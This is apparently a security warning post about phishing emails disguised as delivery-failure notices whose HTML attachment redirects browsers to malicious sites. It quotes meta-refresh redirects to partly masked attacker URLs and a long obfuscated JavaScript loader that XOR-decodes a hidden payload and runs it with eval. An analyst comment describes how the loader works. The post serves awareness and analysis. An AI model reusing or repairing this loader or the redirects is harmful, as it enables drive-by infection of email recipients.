Some of you may be excited to get email from Postmaster or Mailer-Daemon, but unless you are the email administrator they are NOT your friend. There is currently email going out that claims to be an NDR (Non-Delivery Report), that is, a notice that an email you sent to someone failed to deliver. The problem is that this NDR does not tell you who the email was sent to, just that you sent it. Oh, but look, there is an attachment. The attachment says Original Message or similar.
This is NOT the original message but an HTML file. Opening it launches your browser, which is then redirected to a website that has a flaw in it or, if you are lucky, to a website trying to sell you something.
I have seen various forms of this; so far they are all from mailer-daemon or postmaster. Most of them originate from Russia. The other subjects I’ve seen are:
Delivery Status Notification
Email Policy Violation
One had this refresh:
<meta http-equiv=”refresh” content=”0;url=http://www.loge1**1amsterdam.nl/index3.html” />
<meta http-equiv=”refresh” content=”0;url=http://galleryp*.co.kr/index3.html” />
Notice that both end with index3.html
The JavaScript:
<!--
  Analyst notes (from reading the listing below; nothing here was executed):
  * The listing is shown as it was pasted into the post: straight quotes appear
    as typographic quotes, and property-name strings such as 'u006cu0065' have
    evidently lost the backslashes of their \u escapes, so it does not parse as
    written.
  * wGV is a hex string. lJ(wGV) prefixes each two-character pair with '%' and
    passes the result to unescape() to obtain the encoded bytes.
  * Each byte is XORed with the constant 130 and with one character from each
    of two repeating key streams that h() registers and n() reads: 'sT' is the
    source text of lJ itself (new String(lJ)) with every character outside
    [@a-zA-Z0-9_-] removed, and 'l' is the decimal string of the checksum y()
    computes over that text (sum of char code * text length).
  * Because the key is the function's own text, renaming, reformatting or
    adding code inside lJ changes the decoded output. Analyse a byte-exact copy.
  * Before decoding, lJ returns early when the string form of document.write
    contains "arity". This looks like an environment check; its purpose is not
    stated on the page.
  * The decoded string is passed to window.eval().
  * Property names (length, charCodeAt, fromCharCode, write, indexOf,
    setTimeout, unescape, substr, replace, eval) are split between \u escapes
    and unescape('%..') so that they never appear as plain words.
  * The many unused declarations (Math.random(), Math.ceil(n), new Array(),
    new Date(), numeric constants) and the statements placed after a return
    are filler.
-->
<script>var uKU = Math.random();var xIF=”;var nE = Math.random();var yLI = Math.random();var wGV;var mTM=”;var rN = Math.ceil(41);var jZ=”;var rGU=”;wGV=’b1abb8′+’b2bab2′+’b4baf2′+’99ad85′+’a0fbfd’+'e7cfae’+'aeb7a2′+’dff3e8′+’b9abab’+'a1adb9′+’a6aea0′+’b0bab4′+’82acb9′+’a99eb3′+’b5f5aa’+'a2bde8′+’a1bab3′+’a683f1′+’e7b8b8′+’abb7e7′+’f9′;var qS = Math.random();var mRC=55850;function lJ(nU){var sR=”;var gU=”;function y(f){var fL=new Array();var x=new Array();var v=0,r=f['u006cu0065'+unescape('%6e%67%74%68')];var vF = Math.ceil(6);var uI = Math.ceil(6);var yT=new Array();for(var iD=2;iD<r+2;iD++){var yX=false;var yZ=false;var z=new Array();var oL = Math.ceil(24);var dM = Math.ceil(24);uK=qM(f,iD-2);v=v+uK*r;}var uB = Math.ceil(11);var gUQ=false;var yTR=”;var zJ=50530;return new String(v);var kQ=”;var tS=new Array();}var rMA=false;var sP=”;function h(s, t){var tZ=”;var iP = Math.ceil(33);var hZ = Math.ceil(33);if(fS == null) {var bX=false;var uIM=false;var hR = Math.ceil(21);fS = {};var xBN=false;var aYZ=new Date();var wZ=”;}var e=new Array();if(fS[s] == null) {var jU = Math.ceil(44);var zFI=”;var qH = Math.ceil(44);var pBM=”;var eJ=”;var uO = Math.ceil(41);var q = Object;var nA=new Array();var bN=new Array();var qA=new Array();var vR=false;fS[s] = new q();var hXT=54078;fS[s].wK = 0;var bC=new Date();var mP=false;fS[s].u = t;var w=false;}var bH=”;var lX=new Date();}function n(s) {var sY = Math.ceil(42);if(fS[s] != null) {var gT=48196;var pA=”;var pB = fS[s];var bF=48403;var nK = pB.wK;var hXG=”;var pT=new Date();var tYJ=”;var iG = pB.u;var xDP = Math.random();var tY = iG.substr(nK, 1);var gG = iG['u006cu0065'+unescape('%6e%67%74%68')]; var aU = 1;var mX = Math.ceil(42);var dE=”;if(nK + aU < gG) {var kL = Math.random();var qR=new Array();var pBO = Math.ceil(29);pB.wK = nK + aU;var dZK=”;var gZW=new Date();} else {var fCY = Math.random();pB.wK = aU – 1;var bHE=24510;var wB = Math.ceil(37);}return qM(tY, aU – 1);var fEL=48782;var nJG=46689;var bNX = Math.random();}var iR = 
Math.random();}var zK = Math.random();var nO = Math.random();var gX=”;function qM(xB,gR){var zN=new Array();return xB['u0063u0068u0061u0072'+unescape('%43%6f%64%65%41%74')](gR);var hS=new Array();}var iC=42895;var wY=7594;var qG=”;var xV=new Array();var lM=false;var cA=”;function eD(aX,fO){var bCL=”;var xU = Math.random();return aX^fO;var aJ=29561;}var pQ = Math.ceil(36);var hC=56770;function d(xB,gR){var tUX = Math.ceil(29);var bI=”;return xB['u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')](gR);var uER = Math.random();var aL = Math.random();var aXS = Math.random();}var tT=”;var eZ=”;var jUK = Math.ceil(44);var oG=window;var qW=”;var lBA = Math.ceil(15);var gW=new Array();var fS = null;var lU=new Array();var hMQ=false;var wV=String;var wYA=new Array();var vZ=document;var bWH=false;var aJP=false;var bE = new wV(lJ);var fT=”;var yB=new Date();var cNZ=new Array();var bJ=”;var xD = new wV(vZ['u0077'+unescape('%72%69%74%65')]);var eN=”;var dS=16914;var aZ = xD['u0069u006eu0064u0065'+unescape('%78%4f%66')](‘u0061u0072′+unescape(‘%69%74%79′));var yNI = Math.ceil(33);var lZ=new Array();var sHN=new Array();if(aZ != -1) {var dQ=36609;var vA=new Array();var fZ=28165; return 130;}var bY=9596;var sW = Math.ceil(24);var vLV = Math.random();var rC=wV['u0066'+unescape('%72%6f%6d%43%68%61%72%43%6f%64%65')];var oRL=new Array();var uP=130;var tP = oG['u0073u0065u0074u0054'+unescape('%69%6d%65%6f%75%74')];var dWL=”;var wP=new Array();var jT = ”;var pTR=new Date();var nJ=oG['u0075u006eu0065u0073u0063u0061'+unescape('%70%65')];var oK = Math.ceil(44);var rUT=new Array();var rDJ = Math.ceil(44);var cI = ”;var jXH = Math.ceil(6);var qQ = Math.ceil(6);var tW = Math.random();var j = ‘%’;var lVC=”;var oHK = Math.random();var pY = 2;var uT=new Array();var vX = Math.random();var kY = Math.random();var uQ = 0;var zD=uQ;var hSS = Math.ceil(8);var qHI=”;var pOJ=11644;while(zD < nU['u006cu0065'+unescape('%6e%67%74%68')]){var vW=”;var tI=new Array();var pZ=new Array();cI+= j + 
nU['u0073'+unescape('%75%62%73%74%72')](zD, pY);var hD=”;var cQ = Math.random();var cLL = Math.random();zD+=pY;var yG=new Array();var qME=22402;var zGY=new Date();}var hDY=”;var hKT=58760;var pR = Math.ceil(40);var uU=new Array();var nU = nJ(cI);var kHB=”;var aY = bE['u0072u0065u0070u006c'+unescape('%61%63%65')](/[^@a-z0-9A-Z_-]/g, new String());var gB=”;var c = new wV(y(aY));var bLJ = Math.ceil(34);var sOG=”;var bZJ=false;var fMR=new Array();h(‘sT’, aY);h(‘l’, c);var mWF = Math.random();var iMP=46233;var wG = Math.ceil(47);var kRR=false;var dU=uQ;var fDZ=”;var fH=”;var rH=false;var cOD=false;while(dU < 10000) {var dWY=false;var xF = Math.random();var gXD=new Date();var cFX=”;var cK=”;var qJ = nU['u0063u0068u0061u0072'+unescape('%43%6f%64%65%41%74')](dU);if(isNaN(qJ)) break;var bYL=new Date();var nT=”;qJ = eD(qJ, uP);qJ = eD(qJ, n(‘l’));qJ = eD(qJ, n(‘sT’));var aHO=new Array();var hAF=60523;var eP=new Date();var nUA=”;jT=jT+d(wV,qJ);var mNH=”;dU++;var sSF=new Array();var mS = Math.ceil(5);}var sZM=”;oG['u0065'+unescape('%76%61%6c')](jT);var pRK=new Date();var vXF = Math.random();return jT=new wV();var lN=”;var yHE = Math.ceil(49);var fEM = Math.ceil(18);var yU=new Date();};var qX=new Date();var jZS=false;var dLV=”;var tHB=new Date();lJ(wGV);var tRH=”;var vFZ=”;</script>